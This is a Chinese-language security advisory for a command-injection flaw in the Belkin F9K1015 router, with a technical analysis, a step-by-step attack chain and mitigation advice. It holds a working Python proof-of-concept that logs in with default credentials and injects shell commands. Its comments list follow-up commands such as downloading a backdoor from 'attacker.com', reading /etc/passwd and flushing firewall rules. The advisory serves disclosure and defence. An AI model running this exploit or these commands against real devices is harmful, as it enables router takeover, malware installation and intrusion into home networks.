CVE-2025-11303：Belkin F9K1015路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-11303

漏洞类型

命令注入（Command Injection）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Belkin F9K1015 路由器

漏洞概述

CVE-2025-11303是存在于Belkin F9K1015路由器固件版本1.00.10中的一个命令注入漏洞。该漏洞位于路由器的/goform/mp接口文件中，由于对传入的command参数未进行充分的输入验证和过滤，攻击者可以通过精心构造的恶意命令参数注入并执行任意操作系统命令。该漏洞可被远程利用，攻击者只需拥有低权限认证即可发起攻击，无需用户交互。漏洞影响系统的机密性、完整性和可用性，CVSS 3.1评分为6.3分，属于中危级别。该漏洞的利用代码已公开披露，增加了被恶意利用的风险。值得注意的是，安全研究人员在漏洞披露前已联系Belkin厂商，但厂商未对此做出任何回应，也未发布修复补丁，这使得受影响设备面临持续的安全威胁。Belkin F9K1015作为一款消费级无线路由器，广泛应用于家庭和小型办公环境，一旦被攻击者利用，可能导致网络流量劫持、设备控制权丧失及内网渗透等严重后果。

技术细节

该漏洞的核心问题在于Belkin F9K1015路由器固件（版本1.00.10）中/goform/mp接口对command参数的处理逻辑存在缺陷。当HTTP请求到达该接口时，路由器固件直接将用户传入的command参数传递给底层操作系统shell执行，而未对该参数进行任何形式的过滤、转义或白名单校验。攻击者可以利用分号（;）、管道符（|）、反引号（`）或命令替换（$()）等Shell元字符，将额外的恶意命令拼接到原始命令之后执行。例如，攻击者可以构造类似`valid_cmd;malicious_cmd`的payload，在合法命令执行后继续执行恶意命令。由于该接口可通过网络远程访问（AV:N），且仅需低权限认证（PR:L），攻击复杂度较低（AC:L），无需用户交互（UI:N），使得该漏洞具有较高的可利用性。成功利用后，攻击者可以在路由器上以底层服务权限执行任意命令，获取设备完全控制权，进而实施中间人攻击、植入后门或对内网其他设备进行横向渗透。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等网络空间搜索引擎或扫描工具识别暴露在互联网上的Belkin F9K1015路由器（固件版本1.00.10），确定目标设备的IP地址和开放端口。

STEP 2

步骤2：获取认证凭据

由于漏洞利用仅需低权限认证（PR:L），攻击者可通过默认凭据（admin/password）、暴力破解或社工等方式获取路由器的合法登录凭据。

STEP 3

步骤3：登录路由器

攻击者使用获取的凭据登录Belkin F9K1015路由器的Web管理界面，建立有效的会话认证。

STEP 4

步骤4：构造恶意Payload

攻击者构造包含Shell元字符（如分号、管道符）的恶意命令payload，例如通过command参数注入系统命令。

STEP 5

步骤5：发送恶意请求

攻击者向/goform/mp接口发送包含恶意command参数的HTTP请求，触发命令注入漏洞。

STEP 6

步骤6：执行任意命令

路由器固件未对command参数进行过滤，直接将其传递给操作系统shell执行，攻击者成功在路由器上执行任意系统命令。

STEP 7

步骤7：设备控制与内网渗透

攻击者获得路由器控制权后，可植入持久化后门、修改DNS设置进行流量劫持、扫描内网设备并进行横向渗透，或将路由器纳入僵尸网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11303 - Belkin F9K1015 Command Injection PoC
# Vulnerability: Command Injection via /goform/mp endpoint
# Affected: Belkin F9K1015 firmware version 1.00.10
# Author: Security Researcher

import requests

# Target router configuration
TARGET_URL = "http://192.168.2.1"  # Default Belkin F9K1015 router address
ENDPOINT = "/goform/mp"

# Authentication credentials (low privilege required)
USERNAME = "admin"
PASSWORD = "password"

def exploit_command_injection(target_url, username, password, cmd):
    """
    Exploit command injection in /goform/mp endpoint
    The 'command' parameter is vulnerable to OS command injection
    """
    session = requests.Session()

    # Step 1: Authenticate to the router
    login_url = f"{target_url}/login.cgi"
    login_data = {
        "login": "true",
        "username": username,
        "password": password
    }
    session.post(login_url, data=login_data)

    # Step 2: Inject malicious command via 'command' parameter
    # Using semicolon (;) to chain commands
    payload = f"valid_command;{cmd}"

    exploit_url = f"{target_url}{ENDPOINT}"
    exploit_params = {
        "command": payload
    }

    response = session.get(exploit_url, params=exploit_params)
    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response: {response.text[:500]}")

    return response

# Example usage: Execute arbitrary command on the router
if __name__ == "__main__":
    # Command to execute on the compromised router
    malicious_command = "id"  # Get current user info
    exploit_command_injection(TARGET_URL, USERNAME, PASSWORD, malicious_command)

    # Additional commands could include:
    # - "cat /etc/passwd" - Read password file
    # - "wget http://attacker.com/backdoor -O /tmp/bd" - Download malware
    # - "reboot" - Denial of service
    # - "iptables -F" - Flush firewall rules

影响范围

Belkin F9K1015 1.00.10

防御指南

临时缓解措施

鉴于Belkin厂商尚未发布安全补丁且未对此漏洞做出回应，建议用户立即采取以下临时缓解措施：1）修改路由器默认管理员密码，使用包含大小写字母、数字和特殊字符的强密码；2）禁用路由器的远程Web管理功能，将管理访问限制在可信的内网IP范围内；3）在网络边界防火墙中限制对路由器管理端口（通常为80/443）的外部访问；4）将路由器置于防火墙保护之后，避免直接暴露在互联网；5）监控路由器的异常网络流量和系统日志，警惕可疑的命令执行活动；6）考虑使用替代方案或更换为仍在积极维护的路由器设备；7）如非必要，关闭路由器的UPnP功能以减少攻击面。